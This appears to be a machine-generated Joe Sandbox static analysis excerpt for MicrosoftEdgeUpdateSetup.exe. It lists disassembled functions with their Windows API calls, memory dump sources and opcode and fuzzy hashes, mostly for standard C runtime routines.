                                        • Instruction Fuzzy Hash: 0E01F6B0A0020DBFEB00EFA49D85ABFB7BCFB14349B5505ADE402A6151D7709E989B64
                                        Function 0016BA2B Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,0016BA2A,?,?,?,?,?,0016C529), ref: 0016BA4D
                                        • TerminateProcess.KERNEL32(00000000,?,0016BA2A,?,?,?,?,?,0016C529), ref: 0016BA54
                                        • ExitProcess.KERNEL32 ref: 0016BA66
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 2ec69be7b2d0f4e3824c45a5b7413fff21d6ae326a46321ef7ddc4aac87cbe26
                                        • Instruction ID: dd22ad0d6081e5f03ee57295b9ddfe42a9a7b7a0ba139eb264fb67d5a494dfab
                                        • Opcode Fuzzy Hash: 2ec69be7b2d0f4e3824c45a5b7413fff21d6ae326a46321ef7ddc4aac87cbe26
                                        • Instruction Fuzzy Hash: E9E0B632104208EFCF126BA4DD4D9593B79FB64342B544528F909C6632CB35DDD2CBD0
                                        Function 00174E70 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8941fc59126de6f7aced8bdbdae33ab855e4fde4c089d936babb22e05aebef09
                                        • Instruction ID: db0448a183ed4d4ec1b4342e175b3f527f932eb44c94060b18c059fbec565101
                                        • Opcode Fuzzy Hash: 8941fc59126de6f7aced8bdbdae33ab855e4fde4c089d936babb22e05aebef09
                                        • Instruction Fuzzy Hash: 0EF14071E01619DFDF14CFA8D8806AEB7B2FF48314F258269E819AB345D7719E41CB90
                                        Function 001788FD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001788F8,?,?,00000008,?,?,00178590,00000000), ref: 00178B2A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: ce0288c31d0d1774b8c043303856e51bdfd355b5180cdc3912c2f6ada856a727
                                        • Instruction ID: bc5d448f479b1e0bcf06f878295b4d4d120654e59772c3f98c0a8af877dbfda7
                                        • Opcode Fuzzy Hash: ce0288c31d0d1774b8c043303856e51bdfd355b5180cdc3912c2f6ada856a727
                                        • Instruction Fuzzy Hash: 02B15971250609DFDB18CF28C48AA657BB0FF44365F29C659E89ECF2A1C735E982CB40
                                        Function 00168A15 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00168A2B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor
                                        • String ID:
                                        • API String ID: 2325560087-0
                                        • Opcode ID: 0d9ed5085a2b6d9bde4e121d3f1a4198963d159d4e9f667d6ef645d257ee337c
                                        • Instruction ID: b2329297351b1aee80c42a8dec42fa60c6e04f23da1dbcb0dbbcdfe06917cf3b
                                        • Opcode Fuzzy Hash: 0d9ed5085a2b6d9bde4e121d3f1a4198963d159d4e9f667d6ef645d257ee337c
                                        • Instruction Fuzzy Hash: A3515CB1A027058FEB24CF98DD857AABBF0FB48314F24856AD415EB690DB749E90CB50
                                        Function 00165EBB Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f80ec1ce433cef4d3d30c3d181c93d777b9a015b16a066daa9c610b3cd435fc8
                                        • Instruction ID: c26f256ea8a4ebcdef1065cc88cae73d8bada3cf438fbbdbb666a7b72453da3d
                                        • Opcode Fuzzy Hash: f80ec1ce433cef4d3d30c3d181c93d777b9a015b16a066daa9c610b3cd435fc8
                                        • Instruction Fuzzy Hash: 3E012471A00204EBEF14AFB5CC45B7EB7B9BF61310F1080ADF4459A092CB749CA5D7A0
                                        Function 00168902 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00008910,00168265), ref: 00168907
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 9ac9631f5244123034c54f4a91f3d3e42adb19e0e991ac42ba03812bc289d782
                                        • Instruction ID: c9eec8b29148749624ec21971d40dcbe4c1f532a787b0cad92c7aaa94005990e
                                        • Opcode Fuzzy Hash: 9ac9631f5244123034c54f4a91f3d3e42adb19e0e991ac42ba03812bc289d782
                                        • Instruction Fuzzy Hash:
                                        Function 0016D145 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 77a7b09691bdfcae62aeeb981a6b1e2614128a0ba8db57e41de922c8f17f13ac
                                        • Instruction ID: 83473852a0bcd029eef2c99f9f8d046add5aef06c0ec2e53c346fab07a94e61d
                                        • Opcode Fuzzy Hash: 77a7b09691bdfcae62aeeb981a6b1e2614128a0ba8db57e41de922c8f17f13ac
                                        • Instruction Fuzzy Hash: F4617970F4020466DB38AE68BCA17BE73A5BF56704F54482EE842DB2C1D7A1DE75C352
                                        Function 001674A9 Relevance: .5, Instructions: 502COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66ccb4ece84a942f385db100ffea8aa42e317c4c6fbdea8c6136426e52c31029
                                        • Instruction ID: 4cb1d0c38279a8e1123b670cd467d19641b850beacc08c6d6f529f8b73539af0
                                        • Opcode Fuzzy Hash: 66ccb4ece84a942f385db100ffea8aa42e317c4c6fbdea8c6136426e52c31029
                                        • Instruction Fuzzy Hash: D002A272E140258BDF18CABCC8906BCBBF2AB84349F154679E456E72C4E7349A91CB94
                                        Function 0017738C Relevance: .1, Instructions: 104COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b51e9d828ed26e011606c1f086b882f32e4a319165edcf77a0bf14b76e05f90c
                                        • Instruction ID: 22d5ca27469445782a67f7cc330f9a00489a323d29a585e5629e0756378c186f
                                        • Opcode Fuzzy Hash: b51e9d828ed26e011606c1f086b882f32e4a319165edcf77a0bf14b76e05f90c
                                        • Instruction Fuzzy Hash: EC21B373F205394B7B0CC57E8C522BDB6E1C78C601745823AE8A6EA2C1D968D917E2E4
                                        Function 0017726C Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 565e575c29a9497dec5f4a62f44e896983a44cb6b5c2e6d77079c56e942573e0
                                        • Instruction ID: dc202eb117cde6c3e8109083826c6915ec64f1068f1c94b6e8c8f3884074e395
                                        • Opcode Fuzzy Hash: 565e575c29a9497dec5f4a62f44e896983a44cb6b5c2e6d77079c56e942573e0
                                        • Instruction Fuzzy Hash: D4118A33F30C255B675C81AD8C1727A95D2DBD825071F533AE826E72C4E9A4DE13D290
                                        Function 00170268 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1db118e030154e50ac309386f30c9eebf9879b0e535817aa5d4d97852a752566
                                        • Instruction ID: b7791c1416e8e8da2d7ce070a6523483a5dab27f4abc2480880e4f2d229822cb
                                        • Opcode Fuzzy Hash: 1db118e030154e50ac309386f30c9eebf9879b0e535817aa5d4d97852a752566
                                        • Instruction Fuzzy Hash: CBE0B672A21268EBCB15DB99894898AB3BCFB49B50B158496F505E3612C6B0DE00C7D0
                                        Function 00179527 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00187388,00000FA0,?,?,00179505), ref: 00179533
                                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00179505), ref: 0017953E
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00179505), ref: 0017954F
                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00179561
                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0017956F
                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00179505), ref: 00179592
                                        • DeleteCriticalSection.KERNEL32(00187388,00000007,?,?,00179505), ref: 001795B5
                                        • CloseHandle.KERNEL32(00000000,?,?,00179505), ref: 001795C5
                                        Strings
                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00179539
                                        • WakeAllConditionVariable, xrefs: 00179567
                                        • kernel32.dll, xrefs: 0017954A
                                        • SleepConditionVariableCS, xrefs: 0017955B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                        • API String ID: 2565136772-3242537097
                                        • Opcode ID: ba9fb97a572e80ed8a1dfef6b1b26c44f944f0d1176b037218161de1cb271cba
                                        • Instruction ID: 02587cd62d44a70069a001941e8ad3fb2125a54b2a9da716fc69ec36893d31c9
                                        • Opcode Fuzzy Hash: ba9fb97a572e80ed8a1dfef6b1b26c44f944f0d1176b037218161de1cb271cba
                                        • Instruction Fuzzy Hash: 0D01D431A80721EFDB212B74AC0DE563A7CAB80B51B640029FC08D2E90DB70CAC09BA1
                                        Function 00170EA9 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 00170EED
                                          • Part of subcall function 0017073C: _free.LIBCMT ref: 00170759
                                          • Part of subcall function 0017073C: _free.LIBCMT ref: 0017076B
                                          • Part of subcall function 0017073C: _free.LIBCMT ref: 0017077D
                                          • Part of subcall function 0017073C: _free.LIBCMT ref: 0017078F
                                          • Part of subcall function 0017073C: _free.LIBCMT ref: 001707A1
                                          • Part of subcall function 0017073C: _free.LIBCMT ref: 001707B3
                                          • Part of subcall function 0017073C: _free.LIBCMT ref: 001707C5
                                          • Part of subcall function 0017073C: _free.LIBCMT ref: 001707D7
                                          • Part of subcall function 0017073C: _free.LIBCMT ref: 001707E9
                                          • Part of subcall function 0017073C: _free.LIBCMT ref: 001707FB
                                          • Part of subcall function 0017073C: _free.LIBCMT ref: 0017080D
                                          • Part of subcall function 0017073C: _free.LIBCMT ref: 0017081F
                                          • Part of subcall function 0017073C: _free.LIBCMT ref: 00170831
                                        • _free.LIBCMT ref: 00170EE2
                                          • Part of subcall function 0016ED43: HeapFree.KERNEL32(00000000,00000000,?,0016BFBC), ref: 0016ED59
                                          • Part of subcall function 0016ED43: GetLastError.KERNEL32(?,?,0016BFBC), ref: 0016ED6B
                                        • _free.LIBCMT ref: 00170F04
                                        • _free.LIBCMT ref: 00170F19
                                        • _free.LIBCMT ref: 00170F24
                                        • _free.LIBCMT ref: 00170F46
                                        • _free.LIBCMT ref: 00170F59
                                        • _free.LIBCMT ref: 00170F67
                                        • _free.LIBCMT ref: 00170F72
                                        • _free.LIBCMT ref: 00170FAA
                                        • _free.LIBCMT ref: 00170FB1
                                        • _free.LIBCMT ref: 00170FCE
                                        • _free.LIBCMT ref: 00170FE6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: f359d33d9a04b66d4fda9ae2ece3f92f1033872e4058d3732842257432e6430f
                                        • Instruction ID: 6001728c612ceb68abcdb8b594038903c63ff5156e1bbeb2ae6c82b157c31aa5
                                        • Opcode Fuzzy Hash: f359d33d9a04b66d4fda9ae2ece3f92f1033872e4058d3732842257432e6430f
                                        • Instruction Fuzzy Hash: 84312A31605701DFEB32AB78D849B9AB7F9AF28310F148529F459DA191EB70AE90CB50
                                        Function 0016E6F1 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: b28a66e1230d7e2057c32beb5e9e9322599787313f95cee9d956cc878b6da431
                                        • Instruction ID: 2c33923291bea670f0b7ade491a5601a267095825f4f7e94ab66f06511893c04
                                        • Opcode Fuzzy Hash: b28a66e1230d7e2057c32beb5e9e9322599787313f95cee9d956cc878b6da431
                                        • Instruction Fuzzy Hash: 6321677A905108EFCB41EF98CC85DDD7BF9AF28340F054666F5159B121EB71EB648B80
                                        Function 0016A39B Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 316COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • type_info::operator==.LIBVCRUNTIME ref: 0016A4BC
                                        • ___TypeMatch.LIBVCRUNTIME ref: 0016A5DB
                                        • _UnwindNestedFrames.LIBCMT ref: 0016A738
                                        • CallUnexpected.LIBVCRUNTIME ref: 0016A753
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 2751267872-393685449
                                        • Opcode ID: 3442f4a0db5e984237e633c8672df2b8a10d1989afd616d811eda4c6e79e31eb
                                        • Instruction ID: 77dec30355554f30284f9d6a115fa6a1772abe9bd2412eda83a4957762c8baf3
                                        • Opcode Fuzzy Hash: 3442f4a0db5e984237e633c8672df2b8a10d1989afd616d811eda4c6e79e31eb
                                        • Instruction Fuzzy Hash: 0CC16D71800209DFCF14DFA4DD819AEBBB9FF54311B984199E8157B202DB71EA61CFA2
                                        Function 001628DA Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000104,00000000,00000000,?), ref: 00162913
                                        • Wow64DisableWow64FsRedirection.KERNEL32(?,MicrosoftEdgeUpdateSetup.exe,?,000000FF), ref: 0016295E
                                        • GetLastError.KERNEL32 ref: 0016296C
                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0016297A
                                        • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0016298D
                                        • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0016299E
                                        Strings
                                        • MicrosoftEdgeUpdateSetup.exe, xrefs: 00162947
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: Wow64$Redirection$FileRevert$CopyDisableErrorLastModuleName
                                        • String ID: MicrosoftEdgeUpdateSetup.exe
                                        • API String ID: 451776147-2400034869
                                        • Opcode ID: 8c9921e8d773e06ba7201d255aa36ea9d3b8b97d8ca4b98157be45b648c6f777
                                        • Instruction ID: 38b656c606d1b288d61ba0a281935320b72074a92a3408bace890a8e56139023
                                        • Opcode Fuzzy Hash: 8c9921e8d773e06ba7201d255aa36ea9d3b8b97d8ca4b98157be45b648c6f777
                                        • Instruction Fuzzy Hash: 1F217C71D00229EFCB14EFA4CC958EEBB78FF24325F400569E426A3291DB305B94CB90
                                        Function 00168D70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON
                                        Download Yara Rule
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00168DA7
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00168DAF
                                        • _ValidateLocalCookies.LIBCMT ref: 00168E38
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00168E66
                                        • _ValidateLocalCookies.LIBCMT ref: 00168EBB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 81e56d572b57212f375246bc44606268beccab354b626c2510b2f39980891185
                                        • Instruction ID: 3420e9d23e286d4780826033efab3e3efd7ad0c310f3398691b2a089cff3d3d6
                                        • Opcode Fuzzy Hash: 81e56d572b57212f375246bc44606268beccab354b626c2510b2f39980891185
                                        • Instruction Fuzzy Hash: 0341A634A00218DBCF10DF68CC85A9EBBB5BF55318F148255E9195B392DB32DE65CBE0
                                        Function 00164863 Relevance: 10.6, APIs: 7, Instructions: 93processsynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStartupInfoW.KERNEL32(?,?,00000000), ref: 001648A7
                                        • CreateProcessW.KERNEL32(00000000,00000010,00000000,00000000,00000000,00000400,00000000,00000000,?,?), ref: 001648E2
                                        • GetLastError.KERNEL32 ref: 001648F3
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00164907
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00164918
                                        • CloseHandle.KERNEL32(?), ref: 0016492B
                                        • CloseHandle.KERNEL32(?), ref: 00164934
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
